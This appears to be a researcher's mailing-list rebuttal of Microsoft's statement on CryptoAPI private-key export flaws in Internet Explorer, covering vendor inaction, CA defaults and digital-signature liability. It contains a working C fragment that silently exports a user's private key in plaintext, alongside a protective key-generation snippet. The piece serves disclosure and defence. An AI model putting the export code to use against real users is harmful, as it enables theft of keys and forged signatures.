>provide protection of encrypted key material in Internet Explorer when using
>the standard Microsoft base CSPs. There were changes between Internet Explorer
>3.0x and Internet Explorer 4.x specifically to address any possible concern.
And the astounding thing was that, despite a complete rewrite of the code, the
newer version offers no extra security at all, as my article points out. Both
are equally weak; you just need to attack them in slightly different ways.
>Key export attacks
>
>The original Internet posting raises concern about the CryptoAPI interface
>CryptExportKey(). This function is fully documented and does indeed export
>private key material in an encrypted format.
The statement from Microsoft omits one important point here. Another security
researcher and I have been trying to tell Microsoft for more than four months
(probably a lot longer; I didn't log the earlier mail) that this is a very
serious security flaw. In each case Microsoft's response was some
variation of "We don't see this as a flaw". It wasn't until my warning was
published that they finally addressed the problem, and even in this case (the
program to set the CRYPT_USER_PROTECTED flag) it's only a quick hack to plaster
over the cracks and allow them to declare the problem fixed. In fact it
doesn't fix the problem at all. I'll post details in a fortnight or so when
I've had time to test things; please don't ask me about this until then.
>The presence of the CryptExportKey() function is to support functionality such
>as migrating key material between machines for a user or creating a backup
>copy of a key. It should be noted however, that many CSPs, including most
>hardware based CSPs, do not allow exportable private keys and will return and
>error in response to a CryptExportKey() request.
However, the CSPs installed by default on every recent system do allow the
export. The fact that there may exist, somewhere, an implementation which
doesn't exhibit this flaw really doesn't help the majority of users.
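The export sequence is short enough to sketch. The following Win32 C fragment
(a sketch only: error handling is elided, and it assumes the key lives in the
user's default container under the default software CSP) shows how any code
running as the user can pull out the private key blob when the key was
generated exportable and without CRYPT_USER_PROTECTED:

```c
#include <windows.h>
#include <wincrypt.h>
#include <stdlib.h>

/* Sketch: silently export the user's key-exchange private key from the
   default software CSP.  If the key was generated CRYPT_EXPORTABLE and
   without CRYPT_USER_PROTECTED, no dialog ever appears. */
BYTE *grabPrivateKey( DWORD *blobLen )
    {
    HCRYPTPROV hProv;
    HCRYPTKEY hKey;
    BYTE *blob;

    /* Attach to the user's default key container */
    if( !CryptAcquireContext( &hProv, NULL, NULL, PROV_RSA_FULL, 0 ) )
        return NULL;

    /* Get a handle to the user's key-exchange key pair */
    if( !CryptGetUserKey( hProv, AT_KEYEXCHANGE, &hKey ) )
        return NULL;

    /* Export it as a PRIVATEKEYBLOB using the usual two-call idiom:
       first query the length, then fetch the data.  With no export key
       (second parameter zero) the blob comes back in plaintext. */
    if( !CryptExportKey( hKey, 0, PRIVATEKEYBLOB, 0, NULL, blobLen ) )
        return NULL;
    blob = malloc( *blobLen );
    CryptExportKey( hKey, 0, PRIVATEKEYBLOB, 0, blob, blobLen );

    return blob;    /* Ship this off for collection */
    }
```

A hardware CSP would fail the CryptExportKey() call, but as noted above the
software CSPs shipped by default succeed, which is exactly the ActiveX attack
discussed below.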
>The posting also asserts that an ActiveX control could be downloaded from a
>web page, simply ask for the current users key, ship the key off for
>collection by an unscrupulous person, and then delete itself without a trace.
>
>If users run unsigned code, or code from an unknown origin, a number of
>unpleasant things can happen. This could indeed occur if the key as been
>marked exportable and the CRYPT_USER_PROTECTED flag is not set.
This was, until my warning, the automatic default action for Verisign, and is
still the automatic default for many other CAs. This means that keys generated
right up until a few days ago (and in some cases keys being generated right
now) have, by default, no protection whatsoever. In addition, I've just been
sent mail saying that CRYPT_USER_PROTECTED still isn't the default with
Verisign: you have to click a box asking for extra security, or you get the
usual default of no protection.
To add to the confusion, a lot of documentation (including the Microsoft
Developer Network (MSDN) online documentation on Microsoft's web site)
describes the CRYPT_USER_PROTECTED flag with "The Microsoft RSA Base Provider
ignores this flag", which can lead programmers to leave it out when it is
*essential* that it always be included. Incidentally, MSDN also claims that
Microsoft are "supporting" PFX, which directly contradicts the claims in their
press release.
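For programmers, the flag has to be supplied at key-generation time. A minimal
Win32 C sketch of what's needed (names are illustrative, error handling
elided) looks like this:

```c
#include <windows.h>
#include <wincrypt.h>

/* Sketch: generate a signature key pair that at least notifies the user
   when it's used.  CRYPT_USER_PROTECTED requests user notification or a
   password prompt on each use of the key; deliberately NOT passing
   CRYPT_EXPORTABLE means later CryptExportKey() calls on the private key
   will fail, which is safer still if key backup isn't required. */
BOOL makeProtectedKey( HCRYPTPROV hProv, HCRYPTKEY *phKey )
    {
    return CryptGenKey( hProv, AT_SIGNATURE,
                        CRYPT_USER_PROTECTED, phKey );
    }
```

A programmer who takes the MSDN "ignores this flag" note at face value and
drops CRYPT_USER_PROTECTED gets a key which can be used, and exported if
exportable, with no user interaction at all.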
>There was also discussion of 16 dialog boxes appearing to the user for their
>password if the CRYPT_USER_PROTECTED flag is set. Certainly asking the user
>too many times would be better than too few times, however in our tests, under
>extreme (and uncommon cases), a user might be asked for their password at most
>four times when a key is used with the Microsoft base CSPs. Perhaps the claim
>came from an early beta release.
The 16 dialog boxes problem was present in 4.0, and it's been confirmed as
still being present in 4.01. This was apparently verified on Microsoft's own
CryptoAPI mailing list (the claimed "beta" version was actually MSIE 4.0
final).
>Microsoft is constantly working to improve the security of our products.
Another researcher and I had been trying to convince Microsoft for more than
four months that things like CryptExportKey() are a major security hole.
Their response each time was some variation of "We don't see this as a
problem". It simply wasn't possible to get them to acknowledge these flaws,
so my posting of the details wasn't "irresponsible" (as some have claimed) but
a necessity in order to get them fixed. When I pointed out several months ago
that Microsoft were using, in their pre-4.x products, an exported key format
identical to the one which I broke more than 1 1/2 years ago, their response
was "What's the problem with this?". I would have liked to include URLs for
the CryptoAPI mailing list archives to prove that Microsoft were warned of
these problems some time ago, but the CryptoAPI archive seems to be
temporarily offline.
Risks of a Private Key Compromise
---------------------------------
One or two respondents have tried to play down the seriousness of a private key
compromise, saying that I exaggerated the dangers in my original message. What
I wanted to point out was how extremely valuable a user's private key is, and
how disappointingly little concern Microsoft seem to have for protecting this
valuable resource. For example Garfinkel and Spafford's "Web Security and
Commerce" (O'Reilly, 1997) contains the warning:
"Today's PC's are no better at storing private keys once they have been
generated. Even though both Navigator and Internet Explorer can store keys
encrypted, they have to be decrypted to be used. All an attacker has to do
is write a program that manages to get itself run on the user's computer (for
example by using [...] Microsoft's ActiveX technology), waits for the key to
be decrypted, and then sends the key out over the network" (p.120).
Including a function like CryptExportKey() (which hands over a user's private
key) makes this very attack possible. The potential damage which can be caused
with a misappropriated private key is enormous. Consider the relative risks in
the compromise of a logon password and a private key. With a logon password,
the worst an attacker can do (apart from stealing possibly valuable data) is to
trash the victim's hard drive, which means reinstalling the operating system
(an action with which many users are intimately familiar). In contrast, an
attacker who obtains a private key can potentially drain the victim's credit
card, clean out their bank account (if the victim uses one of the emerging
online banking services), sign documents in their name, and so on.
The implications of that last point can be quite serious. Take for example the
Utah digital signature act, which was used as a model by a number of other
states which have implemented or are implementing digital signature
legislation.
Under the Utah act, digitally signed documents are given the same evidentiary
weight as notarised documents, and someone trying to overcome this has to
provide "clear and convincing evidence" that the document is fraudulent, which
is difficult since it bears a valid signature from the user's key (this fact has
been used in the past to criticise digital signature laws based on this act).
In addition, under the Utah act and derived acts, anyone who loses their
private key bears unlimited liability for the loss (in contrast, consumer
liability for credit card loss is limited to $50). This leads to the spectre
of a malicious attacker who has the ability to issue notarised documents in
your name for which you carry unlimited liability. This is a lot more
important than someone reformatting your hard drive, or stealing last month's
sales figures.
Peter.